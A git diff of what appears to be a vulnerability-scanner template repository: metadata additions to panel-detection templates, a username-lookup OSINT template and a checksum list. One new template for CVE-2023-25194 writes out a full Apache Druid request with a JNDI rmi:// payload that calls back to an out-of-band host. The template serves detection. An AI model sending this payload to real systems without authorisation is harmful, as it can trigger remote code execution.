+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: "true"
@ -25,3 +30,5 @@ http:
      - type: status
        status:
          - 200
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/opencpu-panel.yaml
+++ b/http/exposed-panels/opencpu-panel.yaml
@ -1,11 +1,16 @@
 id: opencpu-panel

 info:
-  name: OpenCPU Panel
+  name: OpenCPU Panel - Detect
  author: wa1tf0rme
  severity: info
+  description: OpenCPU panel was detected.
  reference:
    - https://github.com/opencpu/opencpu/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
  tags: opencpu,oss
  metadata:
    max-request: 1
@ -22,4 +27,6 @@ http:
        words:
          - OpenCPU Test Page
          - OpenCPU API Explorer
-        condition: or
+        condition: or
+
+# Enhanced by md on 2023/04/25
--- a/http/exposed-panels/opengear-panel.yaml
+++ b/http/exposed-panels/opengear-panel.yaml
@ -4,6 +4,7 @@ info:
  name: Opengear Management Console Login Panel - Detect
  author: ffffffff0x,daffainfo
  severity: info
+  description: The Opengear Management Console admin panel has been discovered.
  reference: https://opengear.com/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
@ -34,4 +35,4 @@ http:
        status:
          - 200

-# Enhnanced by cs 2023/01/09
+# Enhanced by cs 2023/01/09
--- a/http/osint/mail-archive.yaml
+++ b/http/osint/mail-archive.yaml
@ -0,0 +1,30 @@
+id: mail-archive
+
+info:
+  name: The Mail Archive Information
+  author: lu4nx
+  description: Mail-archive information check was conducted.
+  severity: info
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  tags: osint,osint-coding,maillist
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://www.mail-archive.com/search?l=all&q={{user}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<h3>No matches were found for <i></i>"
+        negative: true
+
+      - type: status
+        status:
+          - 200
--- a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
+++ b/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
@ -0,0 +1,90 @@
+id: CVE-2023-25194
+
+info:
+  name: Apache Druid Kafka Connect - Remote Code Execution
+  author: j4vaovo
+  severity: high
+  description: |
+    The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25194
+    - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.1
+    cve-id: CVE-2023-25194
+    cwe-id: CWE-502
+  metadata:
+    verified: "true"
+    shodan-query: html:"Apache Druid"
+  tags: cve,cve2023,apache,druid,kafka,rce,jndi,oast
+
+requests:
+  - raw:
+      - |
+        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+            "type":"kafka",
+            "spec":{
+                "type":"kafka",
+                "ioConfig":{
+                    "type":"kafka",
+                    "consumerProperties":{
+                        "bootstrap.servers":"127.0.0.1:6666",
+                        "sasl.mechanism":"SCRAM-SHA-256",
+                        "security.protocol":"SASL_SSL",
+                        "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
+                    },
+                    "topic":"test",
+                    "useEarliestOffset":true,
+                    "inputFormat":{
+                        "type":"regex",
+                        "pattern":"([\\s\\S]*)",
+                        "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
+                        "columns":[
+                            "raw"
+                        ]
+                    }
+                },
+                "dataSchema":{
+                    "dataSource":"sample",
+                    "timestampSpec":{
+                        "column":"!!!_no_such_column_!!!",
+                        "missingValue":"1970-01-01T00:00:00Z"
+                    },
+                    "dimensionsSpec":{
+
+                    },
+                    "granularitySpec":{
+                        "rollup":false
+                    }
+                },
+                "tuningConfig":{
+                    "type":"kafka"
+                }
+            },
+            "samplerConfig":{
+                "numRows":500,
+                "timeoutMs":15000
+            }
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - 'RecordSupplier'
+
+      - type: status
+        status:
+          - 400
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@ -15,7 +15,7 @@ dns/caa-fingerprint.yaml:db58ace220aea971c5019c9b82beab00bd2f5ad5
 dns/cname-fingerprint.yaml:a5cf5caa268a11dc2e7b866324ea12e8b0a04646
 dns/cname-service.yaml:9f8e381636907c44f06de26775a699dcd3474deb
 dns/detect-dangling-cname.yaml:1c0429cd81e1b66f76a958b74a6f10fb15850e41
-dns/dmarc-detect.yaml:64f72ec4aaaa6e9635854d8993d000b51e1c17bd
+dns/dmarc-detect.yaml:3377ebe11b5245dfad0e9ac1735e9021e0dd419c
 dns/dns-waf-detect.yaml:bf31c8fc04af36ab3027c0fad4e21391952cc5e8
 dns/dnssec-detection.yaml:39ec1822c91e978d3c6ca22e8da912199aa1da37
 dns/ec2-detection.yaml:a083700b8101fd278f74993d87d6569057d8ad79
@ -398,7 +398,7 @@ http/cnvd/2021/CNVD-2021-49104.yaml:1d71aa67f8ab4db9e3ebfc330181264beb014cf9
 http/cnvd/2022/CNVD-2022-03672.yaml:821a14e7040536708c7a870ad72a9bd5a0911484
 http/cnvd/2022/CNVD-2022-42853.yaml:57627926ae68433f4b31f4154de9a0ce0c79dd48
 http/cves/2000/CVE-2000-0114.yaml:6a8c288f6f17dd3f3342d4997154de274e71f3ec
-http/cves/2002/CVE-2002-1131.yaml:198d70e06393f068bbc0109146027a7ed154c23d
+http/cves/2002/CVE-2002-1131.yaml:6c2de2fee718395cca993680a1d4e0c9de2885dc
 http/cves/2004/CVE-2004-0519.yaml:1fdbb2036c825aeac782c857600e9554275674eb
 http/cves/2005/CVE-2005-2428.yaml:550187ff87ca646627c4be146bf697eca21418e0
 http/cves/2005/CVE-2005-3344.yaml:7c6ea112cba53447c2d2fc548e0a759bcaca265e
@ -547,7 +547,7 @@ http/cves/2010/CVE-2010-4769.yaml:7258771b47090f976d13fd0e253f9c7256c102a4
 http/cves/2010/CVE-2010-4977.yaml:5a0a4d9647b9378b5059702b27ca22bd45227ad9
 http/cves/2010/CVE-2010-5028.yaml:f15bb7ca8f7decc408401f4c47e5a035b8b650ee
 http/cves/2010/CVE-2010-5278.yaml:533c3a25939564c0b828527d09dab1d306b63dee
-http/cves/2010/CVE-2010-5286.yaml:fc584d07f30fc3dbe502bd3ec53ba0f7b763180c
+http/cves/2010/CVE-2010-5286.yaml:318274005c16b9a4e8d681cd5d10528dd303b720
 http/cves/2011/CVE-2011-0049.yaml:2847f341a44a2c219559b6e7c325f8c6cfdbd815
 http/cves/2011/CVE-2011-1669.yaml:744421c6dd32e1bb39dbd49ad354e390365bfa26
 http/cves/2011/CVE-2011-2744.yaml:b4430ab467dcb9636c9386e0ad947dbe5898c007
@ -568,10 +568,10 @@ http/cves/2012/CVE-2012-0394.yaml:9913c3af81e641c757290bd428598ab6acef88d2
 http/cves/2012/CVE-2012-0896.yaml:fea878321eeee3bf150a3743cf6574bcb9283c2b
 http/cves/2012/CVE-2012-0901.yaml:b2c013af98a8142b5e2fecc1a85fb6bcee77d638
 http/cves/2012/CVE-2012-0981.yaml:97e0f0feb99e42d438828bded6b154c28a8546b6
-http/cves/2012/CVE-2012-0991.yaml:c796cf4ce74e54c4c852976dfe432035d6f6f6f9
+http/cves/2012/CVE-2012-0991.yaml:158046c78c09aa8185ca2f9767127257477dfbe9
 http/cves/2012/CVE-2012-0996.yaml:e1e158f483877b4ab038f19444bff44b53545591
 http/cves/2012/CVE-2012-1226.yaml:17049a7f68c89618ec1d71d78f216c6a14dbde2f
-http/cves/2012/CVE-2012-1823.yaml:205577dc49c0fcbc1884953265fa0d320bb01f3d
+http/cves/2012/CVE-2012-1823.yaml:3aab5917a9d8a8de75df12165bcb01ce66c68c0f
 http/cves/2012/CVE-2012-1835.yaml:ea54b634cc1872e94978f066184427dab922c0fc
 http/cves/2012/CVE-2012-2371.yaml:d51f719f0e55b3bf6da09c60b263421f06adc5f8
 http/cves/2012/CVE-2012-3153.yaml:a22f605e727a1c113b69a324355165fd6d906230
@ -585,7 +585,7 @@ http/cves/2012/CVE-2012-4889.yaml:5adabdae528ed6832f4f68235a0cf2752e37e569
 http/cves/2012/CVE-2012-4940.yaml:93a08260ec6348a13b8dbf1a54d18cbefb53e523
 http/cves/2012/CVE-2012-5913.yaml:b69eef11830ec647a541b14cba3fc97408a30357
 http/cves/2013/CVE-2013-1965.yaml:582dcf446289c86cca784566558a747dac2968cb
-http/cves/2013/CVE-2013-2248.yaml:e6224c01d0a6ccf49f34e9aaecffe96e882e36cb
+http/cves/2013/CVE-2013-2248.yaml:3bbf838d2506bcc98164950a596da04bb9122a5b
 http/cves/2013/CVE-2013-2251.yaml:95241dd35115934217295e024761b5b77c1a69f7
 http/cves/2013/CVE-2013-2287.yaml:6c2a646ddee24b5fcc9d6a4562357f7f51460586
 http/cves/2013/CVE-2013-3526.yaml:6a7c7c360e82015a830baac57d02715312d3116e
@ -602,10 +602,10 @@ http/cves/2014/CVE-2014-10037.yaml:438ed57796fa41a21aac375d9affc39f528c7ce9
 http/cves/2014/CVE-2014-1203.yaml:f2b2a02f3b6d2c0c92087dedf97d2344472463f5
 http/cves/2014/CVE-2014-2321.yaml:5e606b25b1c61a4aa1556231a8719a590ea73b6a
 http/cves/2014/CVE-2014-2323.yaml:2f57e1c78667d3707bf7315298186dc3d06ba958
-http/cves/2014/CVE-2014-2383.yaml:b5ea98b77d36eba78bc1037ccb8415869e7c7281
+http/cves/2014/CVE-2014-2383.yaml:f5d6a0fe0ffe9e9c80656b74532b7e4df99ef0fe
 http/cves/2014/CVE-2014-2908.yaml:4b0b708d6973024e06302c104ebd4c18c26e1430
 http/cves/2014/CVE-2014-2962.yaml:591d1320efbc5de098e113c76b92eba3ef9d805c
-http/cves/2014/CVE-2014-3120.yaml:7bb8615d2ba4d4e859f7d1236e5f79790abe4159
+http/cves/2014/CVE-2014-3120.yaml:e03fdb35c84783606c5554119b7b102df0f789e2
 http/cves/2014/CVE-2014-3206.yaml:ce6fe7258f4ffeff9997ff44e0dbfcd06f08d473
 http/cves/2014/CVE-2014-3704.yaml:b2ddac6ad135ec1738b4c12604e31da4f5e9f548
 http/cves/2014/CVE-2014-3744.yaml:14974eb720418cf94bbb3710374e46715cc3b935
@ -619,9 +619,9 @@ http/cves/2014/CVE-2014-4550.yaml:c73de30c3ad51220b373060c6c8f97f20975818e
 http/cves/2014/CVE-2014-4558.yaml:fa2a49bf494c357918fa26dce66765b1a53ff059
 http/cves/2014/CVE-2014-4561.yaml:b6fd58fc066a5298454ab748cc5132135b32997b
 http/cves/2014/CVE-2014-4592.yaml:3c2b9e05a62e664b082c20f6edc783db4b3a6d72
-http/cves/2014/CVE-2014-4940.yaml:fa4f4ae8b32e1ffc0a035e7c6929c868cd0def50
+http/cves/2014/CVE-2014-4940.yaml:fa99414ce2bda6edc018fd0d66b8187f06c8565b
 http/cves/2014/CVE-2014-4942.yaml:d3580ffd54ebcfe5835069494be492b2023e32ce
-http/cves/2014/CVE-2014-5111.yaml:be5e62653f197f5eebdae8d4179cb4524f2bedda
+http/cves/2014/CVE-2014-5111.yaml:27f9f3ef50c3c4395c9c1b0ddaf707464d363d9d
 http/cves/2014/CVE-2014-5258.yaml:331970340c2c8066814eff8af635a2632730f8fe
 http/cves/2014/CVE-2014-5368.yaml:00594f828632ba50dec83ad69a3dd75a27b9b175
 http/cves/2014/CVE-2014-6271.yaml:3caac83ce98c6c82ac16d58adbade09b47fa6988
@ -641,11 +641,11 @@ http/cves/2014/CVE-2014-9614.yaml:1c5e5738db439463dba1f9676ad97c1b05e524e4
 http/cves/2014/CVE-2014-9615.yaml:513df9307dadf6e0250879d867f0c4a09bb15c78
 http/cves/2014/CVE-2014-9617.yaml:c6ba7deeae94fd7321b2f0a6ff5ed592731efb98
 http/cves/2014/CVE-2014-9618.yaml:5a88f0bbc9bec83794089caa88c61679b9dae610
-http/cves/2015/CVE-2015-0554.yaml:0331a5905da50ed1c93e6c2bc34d15ab767a707b
+http/cves/2015/CVE-2015-0554.yaml:5db330e35a666f1123b0086eb21c5d7953993c97
 http/cves/2015/CVE-2015-1000005.yaml:e6e694ba27185c2bc2054c521a085d7a32869a8e
 http/cves/2015/CVE-2015-1000010.yaml:f8bd11db8ceb2aadb09b49cec00a53457c53d595
 http/cves/2015/CVE-2015-1000012.yaml:660c1d0dba56e6bedf5f34d5bc6099db7d026cbb
-http/cves/2015/CVE-2015-1427.yaml:0a21e751c01b6a433f8582c9210f4c4e1095facd
+http/cves/2015/CVE-2015-1427.yaml:d3adfe5ac76cb25af766aecaa52510d3e85f4530
 http/cves/2015/CVE-2015-1503.yaml:12036964d0e4690c66969f285d928f49ad8f8ede
 http/cves/2015/CVE-2015-1579.yaml:c8b528b52a97a15e690f84b73a51c19f93c3f645
 http/cves/2015/CVE-2015-1880.yaml:ca7f1f3a9107efcffa188c57817a30b92f9386c3
@ -784,7 +784,7 @@ http/cves/2017/CVE-2017-15715.yaml:3d2ca656232347c4f846cfb00b291863dfebebd0
 http/cves/2017/CVE-2017-15944.yaml:d42ece41eb2db015f9cdd7d363c063f7c6d63ac7
 http/cves/2017/CVE-2017-16806.yaml:b831f0424485345b082a03671f70a0ac5a517a52
 http/cves/2017/CVE-2017-16877.yaml:9d50bcec4aa8d97a41a0a9a37dbde0d7c9413078
-http/cves/2017/CVE-2017-16894.yaml:624972793484ce688ee19d61a81dfdb1a8e087fb
+http/cves/2017/CVE-2017-16894.yaml:31daf5cda9b826809841860f69f90670223337b2
 http/cves/2017/CVE-2017-17043.yaml:2d6f3ecd61972cfa1d0b964e8c624d08f1890aa3
 http/cves/2017/CVE-2017-17059.yaml:20737e85c00e10d20cdb0f5f2c8b331e1de3d017
 http/cves/2017/CVE-2017-17451.yaml:f96e9f95074b6dc5634afc945d4a86781450c10d
@ -958,7 +958,7 @@ http/cves/2018/CVE-2018-7700.yaml:a1a773df8ccd5da363d69a918584a3aa5677a61e
 http/cves/2018/CVE-2018-7719.yaml:0f2005d1cbb73e1927db8d7ddef3593654b8b5fb
 http/cves/2018/CVE-2018-8006.yaml:5c575c3e64235d3e9d34ac4dacf9d531af73eb5d
 http/cves/2018/CVE-2018-8033.yaml:d52e86e1b60949b6ea7115e2f0a744cfef83f692
-http/cves/2018/CVE-2018-8715.yaml:8c65cdf36caa75e9da398a66454ab76347797722
+http/cves/2018/CVE-2018-8715.yaml:5539a2bcfa36c3ebf9339c6c13af71dc0e18310e
 http/cves/2018/CVE-2018-8719.yaml:1c0479c91dc4b3d7947a4ff7d2f8e1cd74d0bb2a
 http/cves/2018/CVE-2018-8727.yaml:c5a1f5e9fcd2c752293dfb7b6fb1327d1ea6aa60
 http/cves/2018/CVE-2018-8770.yaml:2c7fb76d644bd4deb8379d60492a6c23e1dc5b25
@ -1601,7 +1601,7 @@ http/cves/2021/CVE-2021-34621.yaml:8188ba1dc7da2d8c19d43bb5d1f83f89a2e112c0
 http/cves/2021/CVE-2021-34640.yaml:9fa376348dd20d9f5185209b5eebfe429c1405ee
 http/cves/2021/CVE-2021-34643.yaml:a2f8e32b2799f57b2f8ff1191fb181d27a64b026
 http/cves/2021/CVE-2021-34805.yaml:2cb2f8eb6b783c25f89b0bd4bfac7f3f2b140e3d
-http/cves/2021/CVE-2021-35250.yaml:43158a19ca2dac8aa9bbff9bc74d7740d8862e05
+http/cves/2021/CVE-2021-35250.yaml:b784da72fcb4f878846583b7a9a8c3a6781b5f9e
 http/cves/2021/CVE-2021-35265.yaml:a829938d41ad29f7fa48c57090acf796669aa02c
 http/cves/2021/CVE-2021-35336.yaml:ffc28b6881beed9c4a11141d5bc585230cfa3db7
 http/cves/2021/CVE-2021-35380.yaml:e81b6e4051a8edc6c727ee1bf2ac23e8b3c9a9be
@ -1784,7 +1784,7 @@ http/cves/2022/CVE-2022-0747.yaml:3a01d028f8942422f3bb5f87570e1dbf3c8716a6
 http/cves/2022/CVE-2022-0760.yaml:2087d0e0363de0a24ecfda783ef2da610bbee0fa
 http/cves/2022/CVE-2022-0769.yaml:bba3c1869cc69f2d257a7cbc1ecf88a970f6c748
 http/cves/2022/CVE-2022-0773.yaml:47a5bc5482e5a7417a2ba001e2337d1553df796a
-http/cves/2022/CVE-2022-0776.yaml:d08d120c86f2acf1ad96ffbd7ab17f1850e97797
+http/cves/2022/CVE-2022-0776.yaml:8a6f3bb3ab4a38013557885af61f678bf8f2c1c1
 http/cves/2022/CVE-2022-0781.yaml:35b5e08d0624f2c6d0ece0ffc178d0fdf8ab3907
 http/cves/2022/CVE-2022-0784.yaml:e88e35a5ee79aabc840423d751098f8ef3606304
 http/cves/2022/CVE-2022-0785.yaml:57e43ed2e8ab0a7d44072685ad038cb53a884b54
@ -2112,6 +2112,8 @@ http/cves/2023/CVE-2023-0942.yaml:909ef82b6ebfdd2d0f666b7831a5b80d14357404
 http/cves/2023/CVE-2023-0968.yaml:9d3dcc64171b1e94861ae23dedcec3d5847ead0c
 http/cves/2023/CVE-2023-1080.yaml:745fdda182f12f56681a62f278e089fdffe89e97
 http/cves/2023/CVE-2023-1177.yaml:af550c65690ef4a08f87d273e211411d85d45aaf
+http/cves/2023/CVE-2023-1671.yaml:eabc674db31a6ce9ed04210a22437fcf0897c763
+http/cves/2023/CVE-2023-20864.yaml:c461cf54a367dc6fe9e454d679aedfeab2a9845e
 http/cves/2023/CVE-2023-22620.yaml:1aea185a7bdbf34e9e2b17fc7b8d5c2b63bbc384
 http/cves/2023/CVE-2023-22897.yaml:cd37b7f41798a615db00c4ef8ee111aadbfaba88
 http/cves/2023/CVE-2023-23488.yaml:3351d083f957df4a0f12fc8254d0d5c25f8c07f0
@ -2125,24 +2127,26 @@ http/cves/2023/CVE-2023-24367.yaml:c7708205054190fb3728bc1a21be805934a4fd9f
 http/cves/2023/CVE-2023-24657.yaml:12cb50ffff7bde3a3e4a6987d00b5d3f552ced4b
 http/cves/2023/CVE-2023-24733.yaml:cf3005c4cb1e155c2d6a849cd9e0dc778a9655c1
 http/cves/2023/CVE-2023-24735.yaml:268b8124da16529beff4aef6be58fb56a81a8d00
-http/cves/2023/CVE-2023-24737.yaml:436bdec4adea2dac25d3993f57d5fbcd9fda0f66
+http/cves/2023/CVE-2023-24737.yaml:e4eb3ccf513522063b07fbb4c6bad0fb51aeb46d
 http/cves/2023/CVE-2023-26255.yaml:53c1b9ba41c8a19027f763f1e00ffd82f83df462
 http/cves/2023/CVE-2023-26256.yaml:2361ef6720ae1ada2022db6396f1147f31d46527
 http/cves/2023/CVE-2023-27008.yaml:f0a30703c15a6c39e0da8531fe0565f4d1ea25e3
-http/cves/2023/CVE-2023-27159.yaml:25fa470e51ca120d4922337dba43b9b6af23c19e
+http/cves/2023/CVE-2023-27159.yaml:e6b9cc24cfb6c26d925784825f19a7549d2e1d4a
 http/cves/2023/CVE-2023-27179.yaml:3c5ae13a5a9d3e04bb49d1de799ff8009dd69311
 http/cves/2023/CVE-2023-27292.yaml:88d58a70bf7a4b5f596e3cd9e7eb80ba2b429f6a
+http/cves/2023/CVE-2023-27350.yaml:df141d419d9a2c732ec20b79b362301dd322f62b
 http/cves/2023/CVE-2023-27524.yaml:c44d65c45d0f66ba5a288b92474115bf239afde5
 http/cves/2023/CVE-2023-27587.yaml:948a890384662f44c000be013462636ddcc9d991
 http/cves/2023/CVE-2023-28343.yaml:f476073191867ed90c2c609aac34f9c06e4aa9d9
 http/cves/2023/CVE-2023-28432.yaml:8874d4e16b0920f8ccaecd163914d787de16c96e
 http/cves/2023/CVE-2023-29084.yaml:d5cacdd7a1bfa5672a6f6ec1d6c8a6899c82a5f1
+http/cves/2023/CVE-2023-29489.yaml:ac7fcb495a3571fc16976cc8324537c191fcc470
 http/cves/2023/CVE-2023-29922.yaml:49267c8db50815b31e4bd3e94831cab13f616829
 http/default-logins/3com/3com-nj2000-default-login.yaml:3c46b5aafc39a5bab5ffebf26f6ba0cf97019d1f
 http/default-logins/UCMDB/ucmdb-default-login.yaml:4cc3a46850695b0e5a8ea99c5c3af420adc2af3f
 http/default-logins/abb/cs141-default-login.yaml:9b0bd5a3888b1501b9e91359f4d9e0c1f01a1405
 http/default-logins/activemq/activemq-default-login.yaml:c6de07993c75d937675124a3cce1591b1026e4e7
-http/default-logins/adminer-default-login.yaml:90aeddcd93768ab7362a8096a66194b256f231be
+http/default-logins/adminer-default-login.yaml:56a67a89334a4c70927d73fe8337a7e69e5ab460
 http/default-logins/aem/aem-default-login.yaml:206e8c303f009cf79cc18103677f460052f97f7f
 http/default-logins/aem/aem-felix-console.yaml:424f1ae07b00114ddb01bf1eb4dca5f8884a5c1f
 http/default-logins/alibaba/canal-default-login.yaml:74ee001c4077f2e863c837c41ed2c7c444e037b6
@ -2172,7 +2176,7 @@ http/default-logins/dell/emcecom-default-login.yaml:435e630056eba46603a71c49b4c0
 http/default-logins/digitalrebar/digitalrebar-default-login.yaml:a48842f9b9e053ea824fdecf6e9720e0e53e701d
 http/default-logins/druid/druid-default-login.yaml:959f7aa2ecf8af09dfeb47cd39f8516670b06ea8
 http/default-logins/dvwa/dvwa-default-login.yaml:3247673ad0548181c4514cb2f067db9f8bfd00b4
-http/default-logins/empire/empirec2-default-login.yaml:5ecf653baf0a7164293e2ae5141c7bd52bcb39cd
+http/default-logins/empire/empirec2-default-login.yaml:26f7799a3bc4145495ba01d14e4bafbd0a4c7a98
 http/default-logins/emqx/emqx-default-login.yaml:a2f88ebfd9a8745e9f8ac744cef8fc5e7c91f22a
 http/default-logins/exacqvision/exacqvision-default-login.yaml:fe98980ed55e72abf6a4975deb967bc74030b73d
 http/default-logins/flir/flir-default-login.yaml:5953a1808b8eaeeb40ff251829f5fa883b39715e
@ -2194,7 +2198,7 @@ http/default-logins/ibm/ibm-mqseries-default-login.yaml:1fcb187a21c1bc4d142b67aa
 http/default-logins/ibm/ibm-storage-default-credential.yaml:466ef71a1409311179e9e98286ff4bf38e6ccc6b
 http/default-logins/idemia/idemia-biometrics-default-login.yaml:ff82498d4af810cf738bfb1fe6b61793acc30812
 http/default-logins/iptime/iptime-default-login.yaml:dae30bd9b6d42dfa3d151e5757ddd02b83be5ae9
-http/default-logins/jboss/jboss-jbpm-default-login.yaml:85dd7c943399302c48b048157c05515376fdf054
+http/default-logins/jboss/jboss-jbpm-default-login.yaml:7ee99e11bafadbdb3fd91430a81a26d4a816bec7
 http/default-logins/jboss/jmx-default-login.yaml:6341d550d2b1caaa5849e66a09fe8bf11b5a93d8
 http/default-logins/jenkins/jenkins-default.yaml:40b761481b820a7c69debf07363cc0b7eebf4e13
 http/default-logins/jinher/jinher-oa-default-login.yaml:f4adbacb058f9a6cfdcc5e65cd6f8972201b7657
@ -2202,13 +2206,13 @@ http/default-logins/jupyterhub/jupyterhub-default-login.yaml:80440bb151fea11c763
 http/default-logins/kanboard-default-login.yaml:0fe10d43398f46a1936316feee89e6436dc3e1d4
 http/default-logins/kettle/kettle-default-login.yaml:3a9a0a072121cfd59c02acdb7a3a3cf9b5e5f295
 http/default-logins/lutron/lutron-default-login.yaml:a9b18b6c9f90b323a5afd4d701361478bd755d7d
-http/default-logins/magnolia-default-login.yaml:608fb58e1dfc92435e201c835df02d9e18d96965
+http/default-logins/magnolia-default-login.yaml:24d00929d5878b856a4193cbcefbae3d0196dbe1
 http/default-logins/mantisbt/mantisbt-default-credential.yaml:a41e5a0ce4d9b3f10278836e7245d4b90cd6f353
-http/default-logins/minio/minio-default-login.yaml:92fde268a139a760325b5f90281a2686e18b4f25
+http/default-logins/minio/minio-default-login.yaml:bce6936dd23cee3b158b3ef86cfbfbaab62d0ca9
 http/default-logins/mobotix/mobotix-default-login.yaml:5d9fbb4f3747ec5ff7097852c013cd5c3bf460de
 http/default-logins/mofi/mofi4500-default-login.yaml:9c72df35a609e1ea4c95c95e63eef632d753ce49
 http/default-logins/nagios/nagios-default-login.yaml:d36e59c9ea84bca8c30be4f796541df663c86733
-http/default-logins/nagios/nagiosxi-default-login.yaml:f8d97a87d958cc4b66f6de99bcd3de97647d2155
+http/default-logins/nagios/nagiosxi-default-login.yaml:2eb10756fb18dba338fde8bfc26c9483a84a06a1
 http/default-logins/netsus/netsus-default-login.yaml:6c2c50f3b5955eede125ab6cca43000be9f6ab06
 http/default-logins/nexus/nexus-default-login.yaml:2578f570d8ce35eeea3af6b3c011825be162c751
 http/default-logins/nps/nps-default-login.yaml:b418d99528772b0fe40f4d00909b193f9c17b72d
@ -2229,6 +2233,7 @@ http/default-logins/paloalto/panos-default-login.yaml:e3d4f9b309ac9ee7159a58c8a8
 http/default-logins/panabit/panabit-default-login.yaml:21b20e7f56f31562258b097eb7b3dc0fa505cdd3
 http/default-logins/pentaho/pentaho-default-login.yaml:619cfd43f184629a75b6d6a32b0c40e746ea3485
 http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml:df67f8fcaf3cc75da96feca53f0e2420531e3af6
+http/default-logins/powerjob-default-login.yaml:f44c4b7c3ab761507a6695dca3014c2090cb0f3e
 http/default-logins/prtg/prtg-default-login.yaml:03c5b3fbeadadfaf76f81b5afefd84c008f90bae
 http/default-logins/rabbitmq/rabbitmq-default-login.yaml:61d2270bde9043eb1748d8600e0e7497392b9899
 http/default-logins/rainloop/rainloop-default-login.yaml:cbf0a2bedb0c3990f25e4a000da64ae4980a5b7d
@ -2250,7 +2255,7 @@ http/default-logins/supermicro/supermicro-default-login.yaml:8ac5f222e2caa55b71d
 http/default-logins/szhe/szhe-default-login.yaml:4e41765f78d70bae75fa4994a6bb1b7aab20008e
 http/default-logins/tiny-file-manager-default-login.yaml:9926b9e7dab41a2266ba2827e2e8b0c7362a848e
 http/default-logins/tooljet/tooljet-default-login.yaml:3475b533ff4280cc8749b7881224d761de03ac23
-http/default-logins/trassir/trassir-default-login.yaml:e17a0976b62ea22f309f13ab947a2384e8cbe106
+http/default-logins/trassir/trassir-default-login.yaml:aedc36577d050894f8b69f9fae7d14d7fca13e7e
 http/default-logins/versa/versa-default-login.yaml:0fed361310fb13b2aece2dc021dc52b7808ef833
 http/default-logins/versa/versa-flexvnf-default-login.yaml:98f0e82136c9e31094ea64d1f0d6bfb78d6b60f8
 http/default-logins/vidyo/vidyo-default-login.yaml:9bfe66b75d9a9cde03ee4b30f092cd222e3cbbac
@ -2311,7 +2316,7 @@ http/exposed-panels/apache/public-tomcat-manager.yaml:b723fc47b7b805b9eca6e08106
 http/exposed-panels/apache-jmeter-dashboard.yaml:1f67ae69a07e06910deadd326aee5e5d5d315f39
 http/exposed-panels/apiman-panel.yaml:581ac5d59e45c77398a03deb463b442aa8f2520b
 http/exposed-panels/appsmith-web-login.yaml:ab41b19aad2f035da3efd2b2fa86999df88e53c4
-http/exposed-panels/appwrite-panel.yaml:29b9bc67f9d60ef1f24a6fea08391bf6915fdc1f
+http/exposed-panels/appwrite-panel.yaml:95dcdb8f4564e7afbb7a63deb641963262a2806a
 http/exposed-panels/aptus-panel.yaml:a49f9a51633ed5722f8b176f0c1fbe2afaf95a89
 http/exposed-panels/aqua-enterprise-panel.yaml:ece6d0665b4a5e66918235d6543b69258a12cd3a
 http/exposed-panels/arcgis/arcgis-panel.yaml:fd000aa560dfa92eaf73425fdf1cb6a40892c919
@ -2321,7 +2326,7 @@ http/exposed-panels/arcgis/arcgis-tokens.yaml:47c78443dec12ecd5bd07ba4048f536f87
 http/exposed-panels/archibus-webcentral-panel.yaml:ef928ddf6b27b9c8faed6866505d17c3f800223b
 http/exposed-panels/argocd-login.yaml:92eceb0999e8359b14bef7c17cf2c9c36246a11f
 http/exposed-panels/arris-modem-detect.yaml:e2aebc4ac0ffd96d486e5b4f696d262bf5ab18f6
-http/exposed-panels/aspect-control-panel.yaml:daa40e0df5843aef84160faf5b991b8c79664821
+http/exposed-panels/aspect-control-panel.yaml:09bb1660cf31be880441caca948693b1666c10a2
 http/exposed-panels/asus-router-panel.yaml:87838b7f09e0fc96b18b9f6aef4210bf091844e2
 http/exposed-panels/atlantis-detect.yaml:fa5c17b5fe074468b2c1c7073c43e83c1ed948f4
 http/exposed-panels/atlassian-crowd-panel.yaml:78476adb038e3eb4e58ffa0c3a4500a7d2b52842
@ -2339,8 +2344,8 @@ http/exposed-panels/aws-opensearch-login.yaml:f78df8b7d61aefadff91514306acb09724
 http/exposed-panels/axel-webserver.yaml:7f3b93c13c76c423dbe2a461bd125bf0f21094ce
 http/exposed-panels/axigen-webadmin.yaml:bb7cb6021bee2f6853afdd6e5f61987bf9b45a84
 http/exposed-panels/axigen-webmail.yaml:3ae38bb0d596ce489150d472fa47ea9566ecbf54
